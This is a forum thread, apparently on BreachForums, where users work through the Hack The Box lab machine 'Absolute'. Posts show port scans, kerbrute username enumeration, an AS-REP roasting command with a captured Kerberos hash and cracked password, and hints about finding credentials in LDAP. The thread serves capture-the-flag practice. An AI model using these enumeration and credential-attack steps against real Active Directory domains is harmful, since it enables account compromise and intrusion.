Return to forum
Absolute - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#1
September 24, 2022 at 7:11 PM
New machine from 2022-09-24.

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49685/tcp open  unknown
49690/tcp open  unknown
49700/tcp open  unknown
49704/tcp open  unknown
53869/tcp open  unknown
Reply
Member
Member
Posts: 44
Threads: 0
Joined: N/A
Reputation: 0

#2
September 24, 2022 at 8:33 PM
is it really nothing? lol. I mean this is my first windows but I think nothing's interesting even on the smbclient? is the box broken?
Reply
Member
Member
Posts: 44
Threads: 0
Joined: N/A
Reputation: 0

#3
September 24, 2022 at 8:38 PM
or maybe this is really just hard box? lol
Reply
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#4
September 24, 2022 at 9:09 PM
it's just a difficult machine, I'm enumerating it with kerbrute, really a good machine has something well hidden here, one day we'll find out.
Reply
Member
Member
Posts: 15
Threads: 0
Joined: N/A
Reputation: 0

#5
September 24, 2022 at 9:58 PM
==> Found valid users using kerbrute

~/Desktop/Absolute/content ❯ kerbrute userenum --dc absolute.htb -d absolute.htb valid-ones.lst ✘ INT

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 09/24/22 - Ronnie Flathers @ropnop

2022/09/24 18:56:18 > Using KDC(s):
2022/09/24 18:56:18 > absolute.htb:88

2022/09/24 18:56:19 > [+] VALID USERNAME: [email protected]
2022/09/24 18:56:19 > [+] VALID USERNAME: [email protected]
2022/09/24 18:56:19 > [+] VALID USERNAME: [email protected]
2022/09/24 18:56:19 > [+] VALID USERNAME: [email protected]
2022/09/24 18:56:19 > [+] VALID USERNAME: [email protected]

------

==> Didn't understand this smb message

~/Desktop/Absolute/content ❯ cme smb absolute.htb -u s.johnson -p s.johnson -d absolute.htb

SMB absolute.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB absolute.htb 445 DC [-] absolute.htb\s.johnson:s.johnson STATUS_ACCOUNT_RESTRICTION
Reply
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#6
September 24, 2022 at 10:24 PM
https://raw.githubusercontent.com/attackdebris/kerberos_enum_userlists/master/A-Z.Surnames.txt
Reply
Member
Member
Posts: 15
Threads: 0
Joined: N/A
Reputation: 0

#7
September 24, 2022 at 10:52 PM
==> Found a hash

impacket-GetNPUsers absolute.htb/ -no-pass -usersfile users.lst
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User j.roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.chaffrey doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:497eb201bde77b530e7f91557d684f51$96ea311b8a68e8294284f9a56d6bda267ad6e6b318f07993a9860f90bc1d2864012c851f0c3c3a614a67e334031107894eaa66f99a4dbf30ac0f113194652c6a4a8b908ddc8530851c391dd8223f834e5c0fc9d729da2b043e10e89377848cbe4d2c86c16821770e7607d8fdd671703972149a955f643d3bdcc8579758c16dfe84d89849e84004ced3b35174a330538493539174c9d52d75600b3ec2e065331946c67f6730a0c4f643fcb73e3bac028754e6d977454dee698a58e662e33b5fb38148b9a9d2edc3d9954c3bb0d1b9285612e78db0f50314cf7c5e8aec2c2e24e6f024741abd7cab0d53542587
[-] User s.osvald doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.robinson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User n.smith doesn't have UF_DONT_REQUIRE_PREAUTH set

==> Pass is Darkmoonsky248girl
Reply
Member
Member
Posts: 15
Threads: 0
Joined: N/A
Reputation: 0

#8
September 25, 2022 at 12:08 AM
(September 24, 2022, 11:45 PM)Hacker2222 Wrote:
(September 24, 2022, 10:52 PM)Ruki Wrote: ==> Found a hash

impacket-GetNPUsers absolute.htb/ -no-pass -usersfile users.lst
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User j.roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.chaffrey doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:497eb201bde77b530e7f91557d684f51$96ea311b8a68e8294284f9a56d6bda267ad6e6b318f07993a9860f90bc1d2864012c851f0c3c3a614a67e334031107894eaa66f99a4dbf30ac0f113194652c6a4a8b908ddc8530851c391dd8223f834e5c0fc9d729da2b043e10e89377848cbe4d2c86c16821770e7607d8fdd671703972149a955f643d3bdcc8579758c16dfe84d89849e84004ced3b35174a330538493539174c9d52d75600b3ec2e065331946c67f6730a0c4f643fcb73e3bac028754e6d977454dee698a58e662e33b5fb38148b9a9d2edc3d9954c3bb0d1b9285612e78db0f50314cf7c5e8aec2c2e24e6f024741abd7cab0d53542587
[-] User s.osvald doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.robinson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User n.smith doesn't have UF_DONT_REQUIRE_PREAUTH set

==> Pass is Darkmoonsky248girl


think u can only use kerberos for auth ...............


Yes. I requested the TGT and I'm trying to use GetUserSPNs, but is not working.
Reply
Member
Member
Posts: 38
Threads: 0
Joined: N/A
Reputation: 0

#9
September 25, 2022 at 1:24 AM
(September 25, 2022, 12:20 AM)Hacker2222 Wrote:
(September 25, 2022, 12:08 AM)Ruki Wrote:
(September 24, 2022, 11:45 PM)Hacker2222 Wrote:
(September 24, 2022, 10:52 PM)Ruki Wrote: ==> Found a hash

impacket-GetNPUsers absolute.htb/ -no-pass -usersfile users.lst
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User j.roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.chaffrey doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:497eb201bde77b530e7f91557d684f51$96ea311b8a68e8294284f9a56d6bda267ad6e6b318f07993a9860f90bc1d2864012c851f0c3c3a614a67e334031107894eaa66f99a4dbf30ac0f113194652c6a4a8b908ddc8530851c391dd8223f834e5c0fc9d729da2b043e10e89377848cbe4d2c86c16821770e7607d8fdd671703972149a955f643d3bdcc8579758c16dfe84d89849e84004ced3b35174a330538493539174c9d52d75600b3ec2e065331946c67f6730a0c4f643fcb73e3bac028754e6d977454dee698a58e662e33b5fb38148b9a9d2edc3d9954c3bb0d1b9285612e78db0f50314cf7c5e8aec2c2e24e6f024741abd7cab0d53542587
[-] User s.osvald doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.robinson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User n.smith doesn't have UF_DONT_REQUIRE_PREAUTH set

==> Pass is Darkmoonsky248girl


think u can only use kerberos for auth ...............


Yes. I requested the TGT and I'm trying to use GetUserSPNs, but is not working.


just found path ......... ldap with cme gets user descriptions has smbuser creds LOLLLL


¿How did You get the ldap credential?
Reply
Member
Member
Posts: 38
Threads: 0
Joined: N/A
Reputation: 0

#10
September 25, 2022 at 1:40 AM
(September 25, 2022, 01:36 AM)hacker2222 Wrote:
(September 25, 2022, 01:24 AM)codificador1777 Wrote:
(September 25, 2022, 12:20 AM)hacker2222 Wrote:
(September 25, 2022, 12:08 AM)Ruki Wrote:
(September 24, 2022, 11:45 PM)hacker2222 Wrote: creo que solo puedes usar kerberos para autenticación ...............


Sí. Solicité el TGT y estoy tratando de usar GetUserSPNs, pero no funciona.


acabo de encontrar la ruta ......... ldap con cme obtiene las descripciones de los usuarios tiene credenciales de smbuser LOLLLL


¿Cómo obtuviste la credencial ldap?

arriba som1 encontrado asreproast ......


yes, but d.klay or the password are not valid for requesting a tgt  and they are not valid in ldap either
Reply


 Users viewing this thread: Absolute - HTB [Discussion]: No users currently viewing.